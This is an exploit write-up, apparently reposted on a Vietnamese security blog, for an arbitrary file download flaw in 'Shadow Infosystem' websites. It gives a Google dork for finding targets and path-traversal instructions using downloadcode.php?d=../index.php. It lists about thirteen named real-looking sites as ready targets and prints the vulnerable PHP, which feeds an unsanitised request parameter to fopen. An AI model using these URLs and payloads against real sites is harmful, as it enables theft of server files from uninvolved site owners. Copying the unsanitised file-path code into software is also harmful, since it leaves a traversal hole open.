Exploit Shadow Infosystem Arbitrary File Download

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|--------------------------------------------------------------|
|[+] Exploit Title: Shadow Infosystem Arbitrary File Download
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://shadowinfosystem.com
|[+]
|[+] Google Dork: inurl:/downloadcode.php
|[+]
|[+] Tested on: Windows, Linux
|[+]
|[+] Date: 2015.09.21
|[+]
|--------------------------------------------------------------|
|[+] Describe :
|[+]
|[+] At the first search dork and choose a target
|[+]
|[+] Like this : http://www.spacetechgroup.in
|[+]
|[+] Add this to the end of target URL: downloadcode.php?d=
|[+]
|[+] After [?d=] you should enter your file name that you want to download!
|[+]
|[+] Fore example download in that target index.php:
|[+]
|[+] http://www.spacetechgroup.in/downloadcode.php?d=../index.php
|[+]
|[+] In some targets you can only download files that they're in [Current] directory!
|[+]
|[+] But I don't want to download from [file] directory!
|[+]
|[+] Then I put [../] after file name to upload from root directory!
|--------------------------------------------------------------|
|[+] Examples :
|[+]
|[+] http://stteresaschool.in/downloadcode.php?d=../index.php
|[+]
|[+] http://hotelsroyalpark.coM/downloadcode.php?d=../index.php
|[+]
|[+] http://jkgttAcademy.com/downloadcode.php?d=index.php
|[+]
|[+] http://raksHatowersgurgaon.com/downloadcode.php?d=../index.php
|[+]
|[+] http://shaDowInfosystem.com/downloadcode.php?d=../index.php
|[+]
|[+] http://keltecHgroup.com/downloadcode.php?download_file=index.php
|[+]
|[+] http://fnfhomez.com/downloadcode.php?df=../index.php
|[+]
|[+] http://renownedInfra.com/downloadcode.php?download_file=../index.php
|[+]
|[+] http://mmgroupinDia.com/downloadcode.php?df=../index.php
|[+]
|[+] http://sunflowerpublicschool.com/downloadcode.php?file=../index.php
|[+]
|[+] http://hitchintak.in/downloadcode.php?d=../index.php
|[+]
|[+] http://ballyhai.net/downloadcode.php?file=../index.php
|[+]
|[+] http://spacetechgroup.in/downloadcode.php?d=../index.php
|--------------------------------------------------------------|
|[+] Vulnerable Code:
|[+] File: downloadcode.php:
<?php
if(isset($_GET['d'])){
$path = "admin/"; // change the path to fit your websites document structure
$fullPath = $path.$_GET['d'];
}else if(isset($_REQUEST['pf'])){
$fullPath = "payment_pdf/".$_REQUEST['pf'];
}

if ($fd = fopen ($fullPath, "r")) {
$fsize = filesize($fullPath);
$path_parts = pathinfo($fullPath);
$ext = strtolower($path_parts["extension"]);
switch ($ext) {
case "jpg":
header("Content-type: application/jpg"); // add here more headers for diff. extensions
header("Content-Disposition: attachment; filename="".$path_parts["basename"]."""); // use 'attachment' to force a download
break;
default;
header("Content-type: application/octet-stream");
header("Content-Disposition: filename="".$path_parts["basename"].""");

case "pdf":
header("Content-type: application/pdf"); // add here more headers for diff. extensions
header("Content-Disposition: attachment; filename="".$path_parts["basename"]."""); // use 'attachment' to force a download
break;
default;
header("Content-type: application/octet-stream");
header("Content-Disposition: filename="".$path_parts["basename"].""");


case "swf":
header("Content-type: application/swf"); // add here more headers for diff. extensions
header("Content-Disposition: attachment; filename="".$path_parts["basename"]."""); // use 'attachment' to force a download
break;
default;
header("Content-type: application/octet-stream");
header("Content-Disposition: filename="".$path_parts["basename"].""");

case "doc":
header("Content-type: application/doc"); // add here more headers for diff. extensions
header("Content-Disposition: attachment; filename="".$path_parts["basename"]."""); // use 'attachment' to force a download
break;
default;
header("Content-type: application/octet-stream");
header("Content-Disposition: filename="".$path_parts["basename"].""");

case "xls":
header("Content-type: application/xls"); // add here more headers for diff. extensions
header("Content-Disposition: attachment; filename="".$path_parts["basename"]."""); // use 'attachment' to force a download
break;
default;
header("Content-type: application/octet-stream");
header("Content-Disposition: filename="".$path_parts["basename"].""");

case "docx":
header("Content-type: application/docx"); // add here more headers for diff. extensions
header("Content-Disposition: attachment; filename="".$path_parts["basename"]."""); // use 'attachment' to force a download
break;
default;
header("Content-type: application/octet-stream");
header("Content-Disposition: filename="".$path_parts["basename"].""");

case "txt":
header("Content-type: application/txt"); // add here more headers for diff. extensions
header("Content-Disposition: attachment; filename="".$path_parts["basename"]."""); // use 'attachment' to force a download
break;
default;
header("Content-type: application/octet-stream");
header("Content-Disposition: filename="".$path_parts["basename"].""");


}
header("Content-length: $fsize");
header("Cache-control: private"); //use this to open files directly
while(!feof($fd)) {
$buffer = fread($fd, 22048);
echo $buffer;
}
}
fclose ($fd);
exit;
?>

|--------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|

Share on Google Plus

About Vo Uu

Tác Giả là người chuyên nghiên cứu về các kỹ thuật hacking, security, marketing, là người có góc nhìn lạ và đi sâu vấn đề cũng như là một con người thẳng thắn góp ý. Nếu sử dụng bài trên blog mong các bạn dẫn lại nguồn tác giả!!! Tác Giả rất mong có sự đóng góp hội ý từ cộng đồng để cho an toàn an ninh mạng việt nam ngày càng được an toàn hơn!!